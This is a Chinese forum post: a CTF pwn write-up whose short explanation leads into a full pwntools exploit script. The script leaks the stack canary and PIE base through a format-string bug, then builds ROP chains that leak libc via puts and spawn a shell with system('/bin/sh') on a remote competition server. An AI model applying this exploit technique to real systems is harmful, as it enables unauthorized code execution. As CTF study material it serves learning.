-
-
[分享]ctfpwn题考点retlibc,pie,canary
-
发表于: 2023-12-4 12:24
-
今天来看一道pwn题
可以看到canary和pie都开了
则需要拿到canary值还要piebase的基址
这是程序入口进入bird看看
明显看到有字符串漏洞
则可以通过格式化字符串直接泄漏canary和main+1c的地址
main+1c为箭头处
则开始考虑获取后门
没有后门字符串,则需要自己构造通过libc
exp如下
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 | 插入代码import LibcSearcherfrom pwn import *context(log_level = "debug", arch = "amd64", os = "linux")sh = remote('1.container.jingsai.apicon.cn',31185)# sh=process('/home/xinhu/1/ezpie')elf = ELF('/home/xinhu/Desktop/11/vuln')# payload 1sh.sendline(b'%11$p'+b' %13$p')sh.recvuntil("I'm a bird and I'll steal your pie.\n")data1=sh.recv()canry=int(data1[0:18],16)canry1=p64(canry)main=int(data1[19:33],16)-0x1cprint(data1)piebase=main-elf.symbols['main']putsPlt = elf.plt['puts']+piebaseputsGot = elf.got['puts']+piebasesearch=piebase+elf.symbols['search']popRdiAddr = piebase+0x1443retAddr=piebase+0x101ash.sendline(b'1'*72 +p64(canry)+b'1'*8+ p64(popRdiAddr) + p64(putsGot) + p64(putsPlt) + p64(search)) # skipsh.recvuntil('Did u tell me where my binsh is ?\n')sh.sendline(b'1')# data=sh.recv()data=u64(sh.recv(6) + b'\0\0')# print(hex(data))putsGotAddr = datalibc = LibcSearcher.LibcSearcher('puts', putsGotAddr & 0xfff)libcBase = putsGotAddr - libc.dump('puts')shstrAddr = libcBase + libc.dump('str_bin_sh')systemAddr = libcBase + libc.dump('system')# payload 2sh.sendline(b'0'*72+p64(canry)+b'0'*8+ p64(popRdiAddr) + p64(shstrAddr) + p64(retAddr) + p64(systemAddr))sh.sendline(b'1')sh.interactive() |
[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)
|
|
|---|---|
